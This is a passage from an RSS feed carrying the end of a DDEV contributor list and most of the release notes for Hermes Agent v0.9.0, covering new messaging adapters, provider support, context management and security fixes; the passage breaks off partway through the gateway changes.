<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3266115981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7486/hovercard" href="https://github.com/ddev/ddev/pull/7486">#7486</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyppe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyppe">@cyppe</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3378833304" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7584" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7584/hovercard" href="https://github.com/ddev/ddev/pull/7584">#7584</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hockdudu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hockdudu">@hockdudu</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3411404301" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7618" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7618/hovercard" href="https://github.com/ddev/ddev/pull/7618">#7618</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brookemahoney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brookemahoney">@brookemahoney</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3414204022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7620" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7620/hovercard" href="https://github.com/ddev/ddev/pull/7620">#7620</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dragonwize/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dragonwize">@dragonwize</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3391957933" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7599" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7599/hovercard" href="https://github.com/ddev/ddev/pull/7599">#7599</a></li>
<li>@Copilot made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419896929" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7627" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7627/hovercard" href="https://github.com/ddev/ddev/pull/7627">#7627</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.24.7...v1.24.8"><tt>v1.24.7...v1.24.8</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.9.0 (v2026.4.13)]]></title>
<description><![CDATA[Hermes Agent v0.9.0 (v2026.4.13)
Release Date: April 13, 2026
Since v0.8.0: 487 commits · 269 merged PRs · 167 resolved issues · 493 files changed · 63,281 insertions · 24 contributors

The everywhere release — Hermes goes mobile with Termux/Android, adds iMessage and WeChat, ships Fast Mode for ...]]></description>
<link>https://tsecurity.de/de/3488032/downloads/hermes-agent-v090-v2026413/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3488032/downloads/hermes-agent-v090-v2026413/</guid>
<pubDate>Tue, 05 May 2026 03:01:32 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.9.0 (v2026.4.13)</h1>
<p><strong>Release Date:</strong> April 13, 2026<br>
<strong>Since v0.8.0:</strong> 487 commits · 269 merged PRs · 167 resolved issues · 493 files changed · 63,281 insertions · 24 contributors</p>
<blockquote>
<p>The everywhere release — Hermes goes mobile with Termux/Android, adds iMessage and WeChat, ships Fast Mode for OpenAI and Anthropic, introduces background process monitoring, launches a local web dashboard for managing your agent, and delivers the deepest security hardening pass yet across 16 supported platforms.</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Local Web Dashboard</strong> — A new browser-based dashboard for managing your Hermes Agent locally. Configure settings, monitor sessions, browse skills, and manage your gateway — all from a clean web interface without touching config files or the terminal. The easiest way to get started with Hermes.</p>
</li>
<li>
<p><strong>Fast Mode (<code>/fast</code>)</strong> — Priority processing for OpenAI and Anthropic models. Toggle <code>/fast</code> to route through priority queues for significantly lower latency on supported models (GPT-5.4, Codex, Claude). Expands across all OpenAI Priority Processing models and Anthropic's fast tier. (<a href="https://github.com/NousResearch/hermes-agent/pull/6875" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6875/hovercard">#6875</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6960/hovercard">#6960</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7037/hovercard">#7037</a>)</p>
</li>
<li>
<p><strong>iMessage via BlueBubbles</strong> — Full iMessage integration through BlueBubbles, bringing Hermes to Apple's messaging ecosystem. Auto-webhook registration, setup wizard integration, and crash resilience. (<a href="https://github.com/NousResearch/hermes-agent/pull/6437" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6437/hovercard">#6437</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6460/hovercard">#6460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6494/hovercard">#6494</a>)</p>
</li>
<li>
<p><strong>WeChat (Weixin) &amp; WeCom Callback Mode</strong> — Native WeChat support via iLink Bot API and a new WeCom callback-mode adapter for self-built enterprise apps. Streaming cursor, media uploads, markdown link handling, and atomic state persistence. Hermes now covers the Chinese messaging ecosystem end-to-end. (<a href="https://github.com/NousResearch/hermes-agent/pull/7166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7166/hovercard">#7166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7943/hovercard">#7943</a>)</p>
</li>
<li>
<p><strong>Termux / Android Support</strong> — Run Hermes natively on Android via Termux. Adapted install paths, TUI optimizations for mobile screens, voice backend support, and the <code>/image</code> command work on-device. (<a href="https://github.com/NousResearch/hermes-agent/pull/6834" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6834/hovercard">#6834</a>)</p>
</li>
<li>
<p><strong>Background Process Monitoring (<code>watch_patterns</code>)</strong> — Set patterns to watch for in background process output and get notified in real-time when they match. Monitor for errors, wait for specific events ("listening on port"), or watch build logs — all without polling. (<a href="https://github.com/NousResearch/hermes-agent/pull/7635" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7635/hovercard">#7635</a>)</p>
</li>
<li>
<p><strong>Native xAI &amp; Xiaomi MiMo Providers</strong> — First-class provider support for xAI (Grok) and Xiaomi MiMo, with direct API access, model catalogs, and setup wizard integration. Plus Qwen OAuth with portal request support. (<a href="https://github.com/NousResearch/hermes-agent/pull/7372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7372/hovercard">#7372</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7855/hovercard">#7855</a>)</p>
</li>
<li>
<p><strong>Pluggable Context Engine</strong> — Context management is now a pluggable slot via <code>hermes plugins</code>. Swap in custom context engines that control what the agent sees each turn — filtering, summarization, or domain-specific context injection. (<a href="https://github.com/NousResearch/hermes-agent/pull/7464" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7464/hovercard">#7464</a>)</p>
</li>
<li>
<p><strong>Unified Proxy Support</strong> — SOCKS proxy, <code>DISCORD_PROXY</code>, and system proxy auto-detection across all gateway platforms. Hermes behind corporate firewalls just works. (<a href="https://github.com/NousResearch/hermes-agent/pull/6814" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6814/hovercard">#6814</a>)</p>
</li>
<li>
<p><strong>Comprehensive Security Hardening</strong> — Path traversal protection in checkpoint manager, shell injection neutralization in sandbox writes, SSRF redirect guards in Slack image uploads, Twilio webhook signature validation (SMS RCE fix), API server auth enforcement, git argument injection prevention, and approval button authorization. (<a href="https://github.com/NousResearch/hermes-agent/pull/7933" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7933/hovercard">#7933</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7944" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7944/hovercard">#7944</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7940" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7940/hovercard">#7940</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7151" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7151/hovercard">#7151</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7156" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7156/hovercard">#7156</a>)</p>
</li>
<li>
<p><strong><code>hermes backup</code> &amp; <code>hermes import</code></strong> — Full backup and restore of your Hermes configuration, sessions, skills, and memory. Migrate between machines or create snapshots before major changes. (<a href="https://github.com/NousResearch/hermes-agent/pull/7997" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7997/hovercard">#7997</a>)</p>
</li>
<li>
<p><strong>16 Supported Platforms</strong> — With BlueBubbles (iMessage) and WeChat joining Telegram, Discord, Slack, WhatsApp, Signal, Matrix, Email, SMS, DingTalk, Feishu, WeCom, Mattermost, Home Assistant, and Webhooks, Hermes now runs on 16 messaging platforms out of the box.</p>
</li>
<li>
<p><strong><code>/debug</code> &amp; <code>hermes debug share</code></strong> — New debugging toolkit: <code>/debug</code> slash command across all platforms for quick diagnostics, plus <code>hermes debug share</code> to upload a full debug report to a pastebin for easy sharing when troubleshooting. (<a href="https://github.com/NousResearch/hermes-agent/pull/8681" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8681/hovercard">#8681</a>)</p>
</li>
</ul>
<hr>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>Provider &amp; Model Support</h3>
<ul>
<li><strong>Native xAI (Grok) provider</strong> with direct API access and model catalog (<a href="https://github.com/NousResearch/hermes-agent/pull/7372" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7372/hovercard">#7372</a>)</li>
<li><strong>Xiaomi MiMo as first-class provider</strong> — setup wizard, model catalog, empty response recovery (<a href="https://github.com/NousResearch/hermes-agent/pull/7855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7855/hovercard">#7855</a>)</li>
<li><strong>Qwen OAuth provider</strong> with portal request support (<a href="https://github.com/NousResearch/hermes-agent/pull/6282" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6282/hovercard">#6282</a>)</li>
<li><strong>Fast Mode</strong> — <code>/fast</code> toggle for OpenAI Priority Processing + Anthropic fast tier (<a href="https://github.com/NousResearch/hermes-agent/pull/6875" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6875/hovercard">#6875</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6960" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6960/hovercard">#6960</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7037" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7037/hovercard">#7037</a>)</li>
<li><strong>Structured API error classification</strong> for smart failover decisions (<a href="https://github.com/NousResearch/hermes-agent/pull/6514" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6514/hovercard">#6514</a>)</li>
<li><strong>Rate limit header capture</strong> shown in <code>/usage</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/6541" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6541/hovercard">#6541</a>)</li>
<li><strong>API server model name</strong> derived from profile name (<a href="https://github.com/NousResearch/hermes-agent/pull/6857" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6857/hovercard">#6857</a>)</li>
<li><strong>Custom providers</strong> now included in <code>/model</code> listings and resolution (<a href="https://github.com/NousResearch/hermes-agent/pull/7088" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7088/hovercard">#7088</a>)</li>
<li><strong>Fallback provider activation</strong> on repeated empty responses with user-visible status (<a href="https://github.com/NousResearch/hermes-agent/pull/7505" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7505/hovercard">#7505</a>)</li>
<li><strong>OpenRouter variant tags</strong> (<code>:free</code>, <code>:extended</code>, <code>:fast</code>) preserved during model switch (<a href="https://github.com/NousResearch/hermes-agent/pull/6383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6383/hovercard">#6383</a>)</li>
<li><strong>Credential exhaustion TTL</strong> reduced from 24 hours to 1 hour (<a href="https://github.com/NousResearch/hermes-agent/pull/6504" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6504/hovercard">#6504</a>)</li>
<li><strong>OAuth credential lifecycle</strong> hardening — stale pool keys, auth.json sync, Codex CLI race fixes (<a href="https://github.com/NousResearch/hermes-agent/pull/6874" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6874/hovercard">#6874</a>)</li>
<li>Empty response recovery for reasoning models (MiMo, Qwen, GLM) (<a href="https://github.com/NousResearch/hermes-agent/pull/8609" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8609/hovercard">#8609</a>)</li>
<li>MiniMax context lengths, thinking guard, endpoint corrections (<a href="https://github.com/NousResearch/hermes-agent/pull/6082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6082/hovercard">#6082</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7126/hovercard">#7126</a>)</li>
<li>Z.AI endpoint auto-detect via probe and cache (<a href="https://github.com/NousResearch/hermes-agent/pull/5763" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/5763/hovercard">#5763</a>)</li>
</ul>
<h3>Agent Loop &amp; Conversation</h3>
<ul>
<li><strong>Pluggable context engine slot</strong> via <code>hermes plugins</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/7464" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7464/hovercard">#7464</a>)</li>
<li><strong>Background process monitoring</strong> — <code>watch_patterns</code> for real-time output alerts (<a href="https://github.com/NousResearch/hermes-agent/pull/7635" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7635/hovercard">#7635</a>)</li>
<li><strong>Improved context compression</strong> — higher limits, tool tracking, degradation warnings, token-budget tail protection (<a href="https://github.com/NousResearch/hermes-agent/pull/6395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6395/hovercard">#6395</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6453" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6453/hovercard">#6453</a>)</li>
<li><strong><code>/compress &lt;focus&gt;</code></strong> — guided compression with a focus topic (<a href="https://github.com/NousResearch/hermes-agent/pull/8017" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8017/hovercard">#8017</a>)</li>
<li><strong>Tiered context pressure warnings</strong> with gateway dedup (<a href="https://github.com/NousResearch/hermes-agent/pull/6411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6411/hovercard">#6411</a>)</li>
<li><strong>Staged inactivity warning</strong> before timeout escalation (<a href="https://github.com/NousResearch/hermes-agent/pull/6387" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6387/hovercard">#6387</a>)</li>
<li><strong>Prevent agent from stopping mid-task</strong> — compression floor, budget overhaul, activity tracking (<a href="https://github.com/NousResearch/hermes-agent/pull/7983" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7983/hovercard">#7983</a>)</li>
<li><strong>Propagate child activity to parent</strong> during <code>delegate_task</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/7295" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7295/hovercard">#7295</a>)</li>
<li><strong>Truncated streaming tool call detection</strong> before execution (<a href="https://github.com/NousResearch/hermes-agent/pull/6847" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6847/hovercard">#6847</a>)</li>
<li>Empty response retry (3 attempts with nudge) (<a href="https://github.com/NousResearch/hermes-agent/pull/6488" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6488/hovercard">#6488</a>)</li>
<li>Adaptive streaming backoff + cursor strip to prevent message truncation (<a href="https://github.com/NousResearch/hermes-agent/pull/7683" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7683/hovercard">#7683</a>)</li>
<li>Compression uses live session model instead of stale persisted config (<a href="https://github.com/NousResearch/hermes-agent/pull/8258" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8258/hovercard">#8258</a>)</li>
<li>Strip <code>&lt;thought&gt;</code> tags from Gemma 4 responses (<a href="https://github.com/NousResearch/hermes-agent/pull/8562" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8562/hovercard">#8562</a>)</li>
<li>Prevent <code>&lt;think&gt;</code> in prose from suppressing response output (<a href="https://github.com/NousResearch/hermes-agent/pull/6968" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6968/hovercard">#6968</a>)</li>
<li>Turn-exit diagnostic logging to agent loop (<a href="https://github.com/NousResearch/hermes-agent/pull/6549" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6549/hovercard">#6549</a>)</li>
<li>Scope tool interrupt signal per-thread to prevent cross-session leaks (<a href="https://github.com/NousResearch/hermes-agent/pull/7930" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7930/hovercard">#7930</a>)</li>
</ul>
<h3>Memory &amp; Sessions</h3>
<ul>
<li><strong>Hindsight memory plugin</strong> — feature parity, setup wizard, config improvements — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nicoloboschi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nicoloboschi">@nicoloboschi</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6428" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6428/hovercard">#6428</a>)</li>
<li><strong>Honcho</strong> — opt-in <code>initOnSessionStart</code> for tools mode — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kathie-yu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kathie-yu">@Kathie-yu</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6995" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6995/hovercard">#6995</a>)</li>
<li>Orphan children instead of cascade-deleting in prune/delete (<a href="https://github.com/NousResearch/hermes-agent/pull/6513" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6513/hovercard">#6513</a>)</li>
<li>Doctor command only checks the active memory provider (<a href="https://github.com/NousResearch/hermes-agent/pull/6285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6285/hovercard">#6285</a>)</li>
</ul>
<hr>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New Platforms</h3>
<ul>
<li><strong>BlueBubbles (iMessage)</strong> — full adapter with auto-webhook registration, setup wizard, and crash resilience (<a href="https://github.com/NousResearch/hermes-agent/pull/6437" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6437/hovercard">#6437</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6460" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6460/hovercard">#6460</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/6494" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6494/hovercard">#6494</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7107/hovercard">#7107</a>)</li>
<li><strong>Weixin (WeChat)</strong> — native support via iLink Bot API with streaming, media uploads, markdown links (<a href="https://github.com/NousResearch/hermes-agent/pull/7166" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7166/hovercard">#7166</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/8665" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8665/hovercard">#8665</a>)</li>
<li><strong>WeCom Callback Mode</strong> — self-built enterprise app adapter with atomic state persistence (<a href="https://github.com/NousResearch/hermes-agent/pull/7943" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7943/hovercard">#7943</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/7928" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7928/hovercard">#7928</a>)</li>
</ul>
<h3>Discord</h3>
<ul>
<li><strong>Allowed channels whitelist</strong> config — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jarvis-phw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jarvis-phw">@jarvis-phw</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7044" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7044/hovercard">#7044</a>)</li>
<li><strong>Forum channel topic inheritance</strong> in thread sessions — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hermes-agent-dhabibi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hermes-agent-dhabibi">@hermes-agent-dhabibi</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6377" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6377/hovercard">#6377</a>)</li>
<li><strong>DISCORD_REPLY_TO_MODE</strong> setting (<a href="https://github.com/NousResearch/hermes-agent/pull/6333" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6333/hovercard">#6333</a>)</li>
<li>Accept <code>.log</code> attachments, raise document size limit — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kira-ariaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kira-ariaki">@kira-ariaki</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/6467" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6467/hovercard">#6467</a>)</li>
<li>Decouple readiness from slash sync (<a href="https://github.com/NousResearch/hermes-agent/pull/8016" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8016/hovercard">#8016</a>)</li>
</ul>
<h3>Slack</h3>
<ul>
<li><strong>Consolidated Slack improvements</strong> — 7 community PRs salvaged into one (<a href="https://github.com/NousResearch/hermes-agent/pull/6809" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6809/hovercard">#6809</a>)</li>
<li>Handle assistant thread lifecycle events (<a href="https://github.com/NousResearch/hermes-agent/pull/6433" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6433/hovercard">#6433</a>)</li>
</ul>
<h3>Matrix</h3>
<ul>
<li><strong>Migrated from matrix-nio to mautrix-python</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/7518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7518/hovercard">#7518</a>)</li>
<li>SQLite crypto store replacing pickle (fixes E2EE decryption) — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a> (<a href="https://github.com/NousResearch/hermes-agent/pull/7981" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7981/hovercard">#7981</a>)</li>
<li>Cross-signing recovery key verification for E2EE migration (<a href="https://github.com/NousResearch/hermes-agent/pull/8282" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8282/hovercard">#8282</a>)</li>
<li>DM mention threads + group chat events for Feishu (<a href="https://github.com/NousResearch/hermes-agent/pull/7423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7423/hovercard">#7423</a>)</li>
</ul>
<h3>Gateway Core</h3>
<ul>
<li><strong>Unified proxy support</strong> — SOCKS, DISCORD_PROXY, multi-platform with macOS auto-detection (<a href="https://github.com/NousResearch/hermes-agent/pull/6814" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6814/hovercard">#6814</a>)</li>
<li><strong>Inbound text batching</strong> for Discord, Matrix, WeCom + adaptive delay (<a href="https://github.com/NousResearch/hermes-agent/pull/6979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6979/hovercard">#6979</a>)</li>
<li><strong>Surface natural mid-turn assistant messages</strong> in chat platforms (<a href="https://github.com/NousResearch/hermes-agent/pull/7978" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7978/hovercard">#7978</a>)</li>
<li><strong>WSL-aware gateway</strong> with smart systemd detection (<a href="https://github.com/NousResearch/hermes-agent/pull/7510" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7510/hovercard">#7510</a>)</li>
<li><strong>All missing platforms added to setup wizard</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/7949" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7949/hovercard">#7949</a>)</li>
<li><strong>Per-platform <code>tool_progress</code> overrides</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/6348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/6348/hovercard">#6348</a>)</li>
<li><strong>Configurable 'still working' notification interval</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/8572" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8572/hovercard">#8572</a>)</li>
<li><code>/model</code> switch persists across messages (<a href="https://github.com/NousResearch/hermes-agent/pull/7081" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7081/hovercard">#7081</a>)</li>
<li><code>/usage</code> shows rate limits, cost, and token details between turns (<a href="https://github.com/NousResearch/hermes-agent/pull/7038" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7038/hovercard">#7038</a>)</li>
<li>Drain in-flight work before restart (<a href="https://github.com/NousResearch/hermes-agent/pull/7503" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7503/hovercard">#7503</a>)</li>
<li>Don't evict cached agent on failed runs — prevents MCP restart loop (<a href="https://github.com/NousResearch/hermes-agent/pull/7539" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7539/hovercard">#7539</a>)</li>
<li>Replace <code>os.environ</code> session state with <code>contextvars</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/7454" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7454/hovercard">#7454</a>)</li>
<li>Derive channel directory platforms from enum instead of hardcoded list (<a href="https://github.com/NousResearch/hermes-agent/pull/7450" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7450/hovercard">#7450</a>)</li>
<li>Validate image downloads before caching (cross-platform) (<a href="https://github.com/NousResearch/hermes-agent/pull/7125" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7125/hovercard">#7125</a>)</li>
<li>Cross-platform webhook delivery for all platforms (<a href="https://github.com/NousResearch/hermes-agent/pull/7095" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7095/hovercard">#7095</a>)</li>
<li>Cron Discord thread_id delivery support (<a href="https://github.com/NousResearch/hermes-agent/pull/7106" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7106/hovercard">#7106</a>)</li>
<li>Feishu QR-based bot onboarding (<a href="https://github.com/NousResearch/hermes-agent/pull/8570" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/8570/hovercard">#8570</a>)</li>
